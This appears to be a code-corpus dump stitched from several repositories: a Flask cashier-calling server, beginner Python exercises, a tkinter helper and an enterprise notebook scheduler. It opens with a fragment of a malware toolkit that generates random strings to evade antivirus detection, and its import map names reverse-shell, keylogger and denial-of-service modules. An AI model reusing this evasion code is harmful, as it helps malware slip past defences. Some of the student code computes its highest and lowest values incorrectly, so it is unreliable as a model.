"Generating Random String To Decrease AV Ditection...", end="")
Sleep(0.2)
try:
Result = tuple()
for i in range(0, Count):
Result = Result + (random_string(), )
except:
print("\r[" + Red + "-" + Reset + "]" +
"Generating Random String To Decrease AV Ditection...Failed ", end="")
Sleep(1)
print("\r[" + Green + "!" + Reset + "]" +
"Generating Random String To Decrease AV Ditection...Failed -> Passed")
Sleep(0.2)
return False
else:
print("\r[" + Blue + "+" + Reset + "]" +
"Generating Random String To Decrease AV Ditection...Done")
return Result
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,892
|
INFINIT-PLUS-GIT/ccs-server
|
refs/heads/master
|
/modelos.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) Lisoft & AV Electronics - All Rights Reserved
# Unauthorized copying of this file, via any medium is strictly prohibited
# Proprietary and confidential
# Written by Rodrigo Tufiño <rtufino@lisoft.net>, December 2019
"""
Módulo con los modelos y administración de la base de datos
"""
from os import environ
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
app = Flask(__name__)
# Configuraciones
app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('DATABASE')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# Variables
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
class Banco(db.Model):
__tablename__ = 'banco'
id = db.Column(db.Integer, primary_key=True)
nombre = db.Column(db.String(64), nullable=False, unique=True)
estado = db.Column(db.Integer, nullable=False, default=1)
def __repr__(self):
return f'<Banco {self.nombre}>'
@staticmethod
def get_by_id(id):
return Banco.query.get(id)
class Sucursal(db.Model):
__tablename__ = 'sucursal'
id = db.Column(db.Integer, primary_key=True)
banco = db.Column(db.Integer, db.ForeignKey('banco.id'), nullable=False)
nombre = db.Column(db.String(64), nullable=False)
direccion = db.Column(db.Text, nullable=True)
telefono = db.Column(db.Text, nullable=True)
estado = db.Column(db.Integer, nullable=False, default=1)
class TipoCaja(db.Model):
__tablename__ = 'tipo_caja'
id = db.Column(db.Integer, primary_key=True)
banco = db.Column(db.Integer, db.ForeignKey('banco.id'), nullable=False)
nombre = db.Column(db.String(64), nullable=False)
estado = db.Column(db.Integer, nullable=False, default=1)
class Caja(db.Model):
__tablename__ = 'caja'
id = db.Column(db.Integer, primary_key=True)
sucursal = db.Column(db.Integer, db.ForeignKey('sucursal.id'), nullable=False)
tipo_caja = db.Column(db.Integer, db.ForeignKey('tipo_caja.id'), nullable=False)
numero = db.Column(db.Integer, nullable=False)
grupo = db.Column(db.Integer, nullable=False)
direccion = db.Column(db.String(3), nullable=False)
audio = db.Column(db.String(16), nullable=False)
estado = db.Column(db.Integer, nullable=False, default=1)
@staticmethod
def get_by_numero(numero):
return Caja.query.filter_by(numero=numero).first()
@staticmethod
def get_grupos():
rows = Caja.query.filter_by(estado=1).group_by('grupo').all()
grupos = []
for r in rows:
grupos.append(r.grupo)
return grupos
class Hub(db.Model):
__tablename__ = 'hub'
id = db.Column(db.Integer, db.ForeignKey('sucursal.id'), primary_key=True)
serial = db.Column(db.String(10), nullable=False, unique=True)
fecha_instalacion = db.Column(db.DateTime, nullable=True)
parametros = db.Column(db.Text, nullable=True)
estado = db.Column(db.Integer, nullable=False, default=1)
@staticmethod
def get_by_serial(serial):
return Hub.query.filter_by(serial=serial).first()
class Registro(db.Model):
__tablename__ = 'registro'
id = db.Column(db.Integer, primary_key=True)
caja = db.Column(db.Integer, db.ForeignKey('caja.id'), nullable=False)
fecha = db.Column(db.DateTime, nullable=False)
estado = db.Column(db.Integer, nullable=False)
def __repr__(self):
return f'<Registro caja={self.caja}, fecha={self.fecha}, estado={self.estado}>'
class Evento(db.Model):
__tablename__ = 'evento'
id = db.Column(db.Integer, primary_key=True)
hub = db.Column(db.Integer, db.ForeignKey('hub.id'), nullable=False)
fecha = db.Column(db.DateTime, nullable=False)
descripcion = db.Column(db.Text, nullable=True)
estado = db.Column(db.Integer, nullable=False)
def __repr__(self):
return f'<Registro caja={self.caja}, fecha={self.fecha}, estado={self.estado}>'
if __name__ == "__main__":
# Para administrar la base de datos
# ref: https://programadorwebvalencia.com/tutorial-flask-para-crear-chat-con-socketio-y-vuejs/
#
# python3 modelos.py db init
# python3 modelos.py db migrate
# python3 modelos.py db upgrade
manager.run()
|
{"/app.py": ["/modelos.py"]}
|
27,893
|
INFINIT-PLUS-GIT/ccs-server
|
refs/heads/master
|
/app.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) Lisoft & AV Electronics - All Rights Reserved
# Unauthorized copying of this file, via any medium is strictly prohibited
# Proprietary and confidential
# Written by Rodrigo Tufiño <rtufino@lisoft.net>, December 2019
"""
ccs-server.app
~~~~~~~~~~~~~~
Aplicación de servidor para registrar y visualizar llamadas de cajas
"""
from datetime import datetime
from os import environ
from flask import Flask, render_template, request, abort
from dotenv import load_dotenv, find_dotenv
from flask_socketio import SocketIO, emit, disconnect
from modelos import db, Hub, Evento, Caja, Registro
__author__ = 'Rodrigo Tufiño'
__copyright__ = 'Copyright 2020, Cashier Calling System'
__credits__ = ['LISOFT', 'AV Electronics']
__license__ = 'Privative'
__version__ = '1.2.0'
__maintainer__ = 'LISOFT'
__email__ = 'rtufino@lisoft.net'
__status__ = 'Dev'
# Cargar archivo de configuracion
load_dotenv(find_dotenv())
# Flask
app = Flask(__name__)
# Configuraciones
app.config['DEBUG'] = True if environ.get('DEBUG') == 'True' else False
app.config['PORT'] = 80
# Base de Datos
app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('DATABASE')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
# Socketio
app.config['SECRET_KEY'] = environ.get('SECRET_KEY')
DOMAIN = environ.get('DOMAIN')
async_mode = None
socketio = SocketIO(app, async_mode=async_mode)
CODE_KEY = environ.get('CODE_KEY')
NAMESPACE = '/calling'
def validar_peticion(peticion):
"""
Valida las cabeceras (headers) de una peticion RESTful
:param peticion: Objeto request de Flask
:return: True si es correcto. Abortará en caso de error
"""
if not peticion.is_json:
abort(400, "Invalid request format: application/json")
try:
if peticion.headers['X-Code-Key'] != CODE_KEY:
abort(400, "Invalid code key number")
if len(peticion.headers['X-Serial']) <= 0:
abort(400, "No serial number sended")
except KeyError:
abort(406, "Invalid request")
return True
@app.route('/')
def index():
"""
Muestra la pagina de inicio con los grupos disponibles y las cajas
:return: Pagina web renderizada
"""
grupos = Caja.get_grupos()
cajas = Caja.query.filter_by(estado=1).all()
grid = 12 // len(grupos)
return render_template('index.html',
anio=datetime.now().year,
version=__version__,
grupos=grupos,
grid=grid,
cajas=cajas)
@app.route('/viewer', methods=['GET'])
def viewer():
"""
Muestra el visor para llamar a las cajas
:return: Pagina web renderizada
"""
grupo = request.args['grupo']
return render_template('viewer3.html',
grupo=grupo)
@app.route('/api/v1.0/registrar', methods=['POST'])
def registrar():
"""
Endpoint para registrar el llamado a una caja
:return: JSON con codigo de respuesta
"""
# Validar headers de la peticion
validar_peticion(request)
# Obtener el numero de caja
numero_caja = request.json['caja']
# Obtener la caja
caja = Caja.get_by_numero(numero_caja)
if caja is None:
abort(400, "Cashier number invalid")
# Emitir mensaje a WebSocket
llamar_caja(caja)
# Retornar respuesta
return {"message": "ok"}, 200
@app.route('/api/v1.0/iniciar', methods=['POST'])
def iniciar():
"""
Endpoint para registrar un nuevo inicio del ccs-hub
:return: JSON con codigo de respuesta
"""
# Validar headers de la peticion
validar_peticion(request)
# Obtener ip
ip = request.json["IP"]
# Obtener serial del hub
serial = request.headers['X-Serial']
# Obtener el hub
hub = Hub.get_by_serial(serial)
# Crear el evento
evento = Evento(
hub=hub.id,
fecha=datetime.now(),
descripcion=f"INICIADO;IP={ip}",
estado=1
)
# Agregar a la base de datos
db.session.add(evento)
# Comprometer datos
db.session.commit()
print(f"[HUB] NodeMCU con IP {ip}")
# Retornar respuesta
return {"message": "ok"}, 200
@socketio.on('connect', namespace=NAMESPACE)
def conectar():
"""
WebSocket. Emite un mensaje al cliente cuando se establece la conexion
:return: JSON con mensaje desde el servidor
"""
emit('servidor_conectado', {'data': 'Hi from server!'})
@socketio.on('navegador_conectado', namespace=NAMESPACE)
def test_message(message):
"""
WebSocket. Recibe un mensaje desde el cliente
:param message: Mensaje del cliente
:return: Mensaje con el numero de grupo para el cual transmite
"""
ip = request.remote_addr
print("Cliente conectado [" + ip + "] emite para el grupo", message['grupo'])
emit('servidor_conectado', {'data': 'Hola. Emites para el grupo ' + str(message['grupo'])})
@socketio.on('llamada_realizada', namespace=NAMESPACE)
def llamada_realizada(caja):
"""
WebSocket. Recibe un mensaje desde el cliente cuando se ha mostrado en la pantalla
:param caja: Número de la caja que ha sido visualizada
:return: Mensaje con el numero de grupo para el cual transmite
"""
# Crear el registro
registro = Registro(
caja=caja['numero'],
fecha=datetime.now(),
estado=1
)
# Agregar a la base de datos
db.session.add(registro)
# Comprometer datos
db.session.commit()
print(f"[EMIT] Registrada la caja {caja['numero']}")
def llamar_caja(caja):
"""
Emite un mensaje al cliente con los datos de la caja que se llama
:param caja: Objeto caja
:return: No retorna nada
"""
socketio.emit('llamar', {
'numero': caja.numero,
'grupo': caja.grupo,
'direccion': caja.direccion,
'audio': caja.audio
}, namespace=NAMESPACE)
if __name__ == '__main__':
socketio.run(app, host='0.0.0.0')
|
{"/app.py": ["/modelos.py"]}
|
27,902
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson2.py
|
# Lesson 2: If Statements
from Mod2 import guiInput, guiOutput
s=guiInput("Enter three real numbers").split()
x = float(s[0])
y = float(s[1])
z = float(s[2])
if x>0 and y>0 and z>0:
guiOutput("Sum:%1.2f" % (x+y+z));
elif x<0 and y>0 and z>0:
guiOutput("Prod:%1.2f" % (y*z));
elif x>0 and y<0 and z>0:
guiOutput("Prod:%1.2f" % (x*z));
else:
guiOutput("Prod:%1.2f" % (x*y));
s=guiInput("Enter two integers").split()
a = int(s[0])
b = int(s[1])
if a<0 and b<0:
guiOutput("Quot:%1.2f" % (a/b));
elif a>0 and b>0:
guiOutput("Both integers are positive");
else:
guiOutput("At least one integer is positive");
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,903
|
slcdiallo/pythonClass
|
refs/heads/main
|
/exampleLesson4.py
|
##### MODULE OS
# open(filename, mode) "r" is for reading, "w" for writing
# with block guarantees file is closed
# open expects file to be in cwd, otherwise you need to specify path
#with open("exdata.txt","r") as infile:
#s = infile.read() # reads the entire file as 1 string #with "with" dont need to close
#with open("output.txt","w") as outfile:
#outfile.write("this is a test\n"); # write only does strings
#outfile.write("%d\n" %40) # any formatting must be in the string
#StringIO works just like an output file but output is to a string.
#Helpful when the same output goes to different places,
#say screen and file. In Python, to create an object,
#you do not use any special type of operator like new.
#The class name followed by () will create a new object.
#So output = io.StringIO() creates a new object and names it output.
#The io. isneeded because it resides in the io module.
#import io
#output = io.StringIO()# creates a string IO object
#output.write("this a test\n")
#print(output.getvalue()) # getvalue returns the string output
##### MORE LOOPS
#g=(1,2,3) # g is a tuple, uses parentheses/any kind of info can be in tuple/you cant change them
#for x in g: # loop to print all elements in g
#print(x)
#print(x,end="") #for results in all same line
#g=(1,2,3)
#print(g[0]) #means print the first element
#for x in g:
#print(x)
#h=[4,5,6,7,"abc"] # h is a list, uses []
#print(h[4])
#for x in h: # loop to print all elements in h
#print(x)
#s="abcdefg" # s is an str
#for x in s: # loop to print the chars in s
#print(x,end="") #end="" for results in all the same line
#print(x)
##### RANGE
#for x in range(5): # think of range(5) as the sequence 0..4
#print (x) # will print 0 1 2 3 4 (separate lines)
#g=(5,6,7)
#for x in range(len(g)): # len returns number of elements in g
#print(x,g[x]) # prints elements with location OF EACH
##### WHILE LOOPS
#x=0
#while x < 5: # prints 0 1 2 3 4
#print(x)
#x+=1
#s = input("Enter a number")
#while len(s)>0: # terminates when you enter a blank line
#print(s)
#s = input("Enter another number")
##### PROGRAM 4 - EXAMPLE
while True:
s=input("Enter another integer")
if len(s)==0: break # break: breakout of the current loop
width=int(s)
if width>=4 and width<=9:
for j in range(width):
print("*")
elif width>=10 and width<=15:
for j in range(width-1): #use -1 to get equal characters for each side
print("*")
for j in range(width):
print("* ", end="")
print()
# for the Excercise elif for the inner loops
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,904
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Al.py
|
print('Enter a number')
y=input()
usernum=int(y)
print('Enter x')
w=input()
x=int(w)
n1 = int(usernum/x)
n2 = int(n1/x)
n3 = int(n2/x)
print(n1, n2, n3)
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,905
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson4.py
|
#Assignment 4
#Author: Saliou Diallo
#Program 4 - Simple Ascii Drawing
#For this program, ask the user to enter an integer.
#The program will then draw a shapebased on the integer:
#a vertical line for 4-9, an L for 10-15,
#a horizontal line for 16-20 otherwise it says invalid input.
#The program will continue running until there is no input.
while True:
s=input("Enter another integer")
if len(s)==0: break
width=int(s)
if width>=4 and width<=9:
for j in range(width):
print("*")
elif width>=10 and width<=15:
for j in range(width-1): #used -1 to get equal characters for each side
print("*")
for j in range(width):
print("* ", end="")
elif width>=16 and width<=20:
for j in range(width):
print("* ", end="")
else:
print("Invalid input")
print()
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,906
|
slcdiallo/pythonClass
|
refs/heads/main
|
/MyCodeL3.py
|
#For this program you will ask the user to enter the name of a text file.
#Each line in the file will contain two numbers, the first number is the price
#of each widget and the second line is the number of widgets in the order.
#For each line, print the number of items and the total price for the order (widgets*price).
#At the end, print the highest order, the lowest order, and the average order.
#Console output is sufficient.
import os
infile = open("data3.txt","r")
orders = []
for line in infile:
price,count = line.split()
price,count = [float(price),int(count)]
print("Items: %1.2f (Total: %1.2f)" % (count,count*price))
orders += [price*count]
print("The largest order was: ", max(orders))
print("The smallest order was: ", min(orders))
print("The average order was: ", sum(orders)/len(orders))
infile.close();
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,907
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Mod2.py
|
import tkinter as tk
import tkinter.font as Font
# Program 2
def center(widget,relx,rely):
""" places top-level window on display relative to relx,rely """
widget.withdraw() # Remain invisible while we fig+ure out the geometry
widget.update_idletasks() # Actualize geometry information
m_width = widget.winfo_screenwidth()
m_height = widget.winfo_screenheight()
w_width = widget.winfo_reqwidth()
w_height = widget.winfo_reqheight()
x = (m_width - w_width) * relx
y = (m_height - w_height) * rely
widget.geometry("+%d+%d" % (x,y))
widget.deiconify()
def guiInput(prompt,xlen=24,relx=0.4, rely=0.4,extra=0,fntName="Calibri 14"):
"""Works like input but uses Entry, based on javax.swing.JOptionPane.showInputDialog
"""
root = tk.Tk()
result=""
def setResult(event=None):
nonlocal result
result = t2.get()
root.destroy()
caption=tk.Label(root,text="Input",bg="black",fg="white")
caption.pack(fill=tk.X,padx=1,pady=1)
body=tk.Frame(root)
body.pack(padx=4)
t= tk.Label(body,text=prompt,anchor=tk.W)
t.pack(fill=tk.X)
xlen=max(len(prompt),xlen)+extra
t2 = tk.Entry(body,width=xlen,font=fntName)
t2.pack(padx=4,fill=tk.X);
t2.focus_set();
t2.bind('<Return>',setResult)
okbtn = tk.Button(body, text='Ok',command=setResult)
okbtn.pack(ipadx=12,anchor=tk.E,pady=4)
# root.overrideredirect(True)
center(root,relx,rely)
root.focus_force()
root.mainloop()
return result.replace("\n","")
def guiOutput(content:str,title="Output",ex1=None,extra=0,relx=0.4, rely=0.4,fntName="Monaco"):
"""string output to a Window, based on javax.swing.JOptionPane.showMessageDialog
"""
root=tk.Tk()
tk.Label(root,text=title,bg="black",fg="white").pack(fill=tk.X,padx=1,pady=1)
w=content if type(content) is list else content.split(sep="\n")
#w=content.split(sep="\n")
xlen=0
fnt = Font.Font(font=fntName)
xw=0
fntHeight=fnt.metrics()['linespace']-4;
for i in range(len(w)):
glen=fnt.measure(w[i])+extra
if glen>xw:
xw=glen
body=tk.Frame(root,width=xw+40,height=len(w)*fntHeight+4)
body.pack()
for i in range(len(w)):
tk.Label(body,text=w[i],font=fnt,anchor=tk.W).place(x=17,y=i*fntHeight+4,width=xw+4,height=fntHeight)
okbtn = tk.Button(root, text='Ok',command=root.destroy)
okbtn.pack(ipadx=12,padx=12,anchor=tk.E,pady=4)
okbtn.focus_set()
# root.overrideredirect(True)
center(root,relx,rely)
root.wait_visibility()
root.focus_force()
root.mainloop()
def guiGrid(content:list,title="Output",ex1=None,extra=0,relx=0.4, rely=0.4,fntName="Calibri 16"):
"""string output to a Window, based on javax.swing.JOptionPane.showMessageDialog
"""
root=tk.Tk()
tk.Label(root,text=title,bg="black",fg="white").pack(fill=tk.X,padx=1,pady=1)
#w=content if type(content) is list else content.split(sep="\n")
#w=content.split(sep="\n")
xlen=0
fnt = Font.Font(font=fntName)
w=content
xw=[]
for g in range(len(w[0])):
xw.append(0);
fntHeight=fnt.metrics()['linespace']-4;
clen=min(40,len(w))
for i in range(clen):
for g in range(len(w[i])):
glen=fnt.measure(w[i][g])+extra
if glen>xw[g]:
xw[g]=glen
xtotal=0
for i in xw:
xtotal+=i+4
body=tk.Frame(root,width=xtotal+40,height=clen*fntHeight+4)
body.pack()
anchors=[]
for i in range(len(w[2])):
s=w[2][i]
anc=tk.W
if type(s)==str:
pos= s.find(".")
if s.isnumeric() or (pos>0 and s[:pos].isnumeric() and s[pos+1].isnumeric()):
anc=tk.E
else:
anc=tk.E
anchors.append(anc)
for i in range(clen):
pos=17
for g in range(len(w[i])):
s=w[i][g]
anc = anchors[g]
tk.Label(body,text=w[i][g],font=fnt,anchor=anc).place(x=pos,
y=i*fntHeight+4,width=xw[g]+4,height=fntHeight)
pos+=xw[g]+4
okbtn = tk.Button(root, text='Ok',command=root.destroy)
okbtn.pack(ipadx=12,padx=12,anchor=tk.E,pady=4)
okbtn.focus_set()
# root.overrideredirect(True)
center(root,relx,rely)
root.wait_visibility()
root.focus_force()
root.mainloop()
def test():
s=guiInput("Enter 2 integers",relx=0.8)
w=s.split()
if len(w)>0:
x= int(w[0])
y=int(w[1])
guiOutput( "Input:%s\nSum %10d\nDiff %10d\n"
"Product %10d\nQuotient%10d\nModulus %10d" % (s,x+y,x-y,x*y,x/y,x%y),
"Results",fntName="Consolas 32",relx=0.8)
s=guiInput("Enter 2 floats")
w=s.split()
if len(w)>0:
x= float(w[0])
y= float(w[1])
guiOutput( "Input\t%s\nSum\t%1.2f\nDiff\t%1.2f\nProduct\t%1.2f\nQuotient\t%1.2f\nModulus\t%1.2f" % (s,x+y,x-y,x*y,x/y,x%y),
"Results",fntName="Calibri 32",extra=40,relx=0.8)
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,908
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson3.py
|
#Assignment 3
#Author: Saliou Diallo
#For this program you will ask the user to enter the name of a text file. Each line in the file will
#contain two numbers, the first number is the price of each widget and the second line is the number
#of widgets in the order. For each line, print the number of items and the total price for the order
#(widgets*price) At the end, print the highest order, the lowest order, and the average order. Console
#output is sufficient.
import os
infile = open("data3.txt","r")
# let's set the variables that we're going to use
sum = 0.0
len = 0
hi = 0
lo = 0
# let's process the file
for s in infile:
s1 = s.split()
x = float(s1[0])
y = float(s1[1])
z = x*y
print ("Number of items: %3d Total price for the order: %5.2f" % (y,x*y))
sum += z
len += 1
if (sum > hi) : hi = sum
if (lo == 0 or sum < lo) : lo = sum
print ("Average: %5.2f Lowest: %5.2f Highest: %5.2f" % (sum/len,lo,hi))
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,909
|
slcdiallo/pythonClass
|
refs/heads/main
|
/testLesson3.py
|
import os
infile = open("data3.txt","r")
# let's set the variables that we're going to use
sum = 0.0
len = 0
hi = 0
low = 0
# let's process the file
for s in infile:
s1 = s.split()
x = float(s1[0])
y = float(s1[1])
print ("Number of items: %5d Total price for the order: %10.2f" % (y,x*y))
sum += x*y
len += 1
if (sum > hi): hi = sum
if (low == 0 or sum < low): low = sum
print ("Avg", sum/len, "Lowest", low, "Highest", hi)
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,910
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson1.py
|
#Saliou Diallo
#Write a module that first asks the user to enter 2 integers and then print the sum, difference,
#product, quotient, integer quotient, and modulus of the 2 numbers. Then ask the user to enter 2 real
#numbers. Print the sum, difference, product, quotient, integer quotient, and modulus using the %
#operator. Specify the width and number of digits after the decimal and be sure to specify an adequate
#width. The video demonstrates some of the above in the Python IDLE.
print('Enter an integer') #ask to enter 1 integer
x=input()
y=int(x) #int is to convert to integer
print('Enter another integer') #ask to enter another integer
z=input()
w=int(z)
print('Sum:',y+w,'Difference:',y-w, 'Product:', y*w, 'Quotient:',y/w,'Integer Quotient:',y//w,'Modulus:',y%w)
#Modulus is remainder; what is left over after you divide
s=input('Enter 2 real numbers').split()
# split() gives a list of strings
a=float(s[0]) #float is to convert to a real number
b=float(s[1])
print('Sum %5.2f Difference %5.2f Quotient %5.2f IntegerQuotient %5.3f Modulus %5.3f' % (a+b, a-b, a/b, a//b, a%b))
# % operator is used for formatting
# when you format you have to have a format string
# after formatting you have to have a tuple
# a tuple is one or more values in parenthesis seperated by a comma (1,2)
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,911
|
slcdiallo/pythonClass
|
refs/heads/main
|
/exampleLesson3.py
|
from Mod2 import guiInput,guiOutput
#import os # os stand for operating system
#print(__file__) # complete path of the file being executed in the shell
#print(os.getcwd()) # cwd current working directory: The folder where the shell is running the program
#import os
#infile = open("data.txt","r") # infile is just a name # r is for read # w is for write
#s = infile.read() # read will read everything in the file, it returns a string of what is in the file
#infile.close()
#print(s) # '\n' "\n" looks exactly what is in the file
#import os
#infile = open("data.txt","r")
#for s in infile: # a for loop starts with the word for # automatically does a readline # : is a block it automatically indent
#print(s,end="")
#infile.close()
#import os
#infile = open("data.txt","r")
#for s in infile:
#s2 = s.split() # s2 is another variable # split breaks it down
#x = float(s2[0])
#y = float(s2[1])
#print (s ,x*y) # have to convert in order to do calculations
#infile.close()
#import os
#infile = open("data.txt","r")
#avg=0.0 #wanna make sure it is float
#len=0 #wanna make sure it is int
#for s in infile:
#s2 = s.split()
#x = float(s2[0])
#print (x)
#avg += x # += means add to # add x to avg # so you are adding all the first numbers
#len += 1 # add 1 to len=count of numbers
#print ("Avg", avg/len) # total of 1st numbers / count
#infile.close()
import os
infile = open("data3.txt","r")
avg=0.0
len=0
hi=0
for s in infile:
s2 = s.split()
x = float(s2[0])
print (x)
avg += x
len += 1
if x>hi : hi=x # when doing highest and lowest you have to use an if
print ("Avg", avg/len, "Highest", hi)
#output to a file is almost as easy as writing to the screen
outfile=open("output.txt","w") # w open for writing #automatically create output.txt
outfile.write("Avg %f Highest %d" % (avg/len, hi)) #it would write in the output.txt the results
outfile.close()
infile.close()
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,947
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/tests/__init__.py
|
# -*- coding: utf-8 -*-
"""Unit test package for enterprise_scheduler."""
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,948
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/util.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import asyncio
import zipfile
def fix_asyncio_event_loop_policy(asyncio):
"""
Work around https://github.com/tornadoweb/tornado/issues/2183
"""
class PatchedDefaultEventLoopPolicy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
try:
return super().get_event_loop()
except RuntimeError:
# "There is no current event loop in thread"
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(PatchedDefaultEventLoopPolicy())
def zip_directory(zip_name, directory):
zip_file = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
print('> Processing resources from: ' + directory)
for root, dirs, files in os.walk(directory):
for file in files:
print('> Adding file to job archive: ' + file)
zip_file.write(os.path.join(root, file), file)
zip_file.close()
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,949
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/resources/ffdl/run_notebook.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import nbformat
import papermill as pm
print('')
print('Start notebook execution...')
try:
input = 'notebook.ipynb'
output = os.environ['RESULT_DIR'] + '/result.ipynb'
pm.execute_notebook(
input,
output
)
time.sleep(10)
with open(output, 'r') as file:
print(file.read())
except BaseException as base:
print('Error executing notebook cells: {}'.format(base))
print('Notebook execution done')
print('')
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,950
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/executor.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import tempfile
import time
import yaml
import requests
import nbformat
import shlex
import pkg_resources
from ffdl.client import Config
from ffdl.client import FfDLClient
from shutil import copyfile
from requests.auth import HTTPBasicAuth
from enterprise_gateway.client.gateway_client import GatewayClient
from enterprise_scheduler.util import zip_directory
from urllib.parse import urlparse
class Executor:
"""Base executor class for :
- Jupyter
- FFDL (Fabric for Deep Learning)
- DLAAS (Deep Learning as a Service)"""
def __init__(self, default_gateway_host=None, default_kernelspec=None):
self.default_gateway_host = default_gateway_host
self.default_kernelspec = default_kernelspec
class JupyterExecutor(Executor):
TYPE = "jupyter"
def execute_task(self, task):
# start notebook
print('')
print('Start notebook execution...')
print('Starting kernel...')
launcher = GatewayClient(task['endpoint'])
kernel = launcher.start_kernel(task['kernelspec'])
time.sleep(10)
# execute all cells
try:
print('reading notebook contents')
notebook = nbformat.reads(json.dumps(task['notebook']), as_version=4)
print('Starting cell execution')
for cell in notebook.cells:
print('Executing cell\n{}'.format(cell.source))
response = kernel.execute(cell.source)
print('Response\n{}'.format(response))
outputs = []
outputs.append(response)
cell['outputs'] = outputs
except BaseException as base:
print('Error executing notebook cells: {}'.format(base))
finally:
print('Starting kernel shutdown')
# shutdown notebook
launcher.shutdown_kernel(kernel)
print('Notebook execution done')
print('')
class FfDLExecutor(Executor):
"""FFDL Executor Supports :
- TensorFlow
- Keras
- Caffe
- Caffe 2
- PyTorch"""
TYPE = "ffdl"
def __init__(self):
self.workdir = os.path.join(tempfile.gettempdir(), str(FfDLExecutor.TYPE))
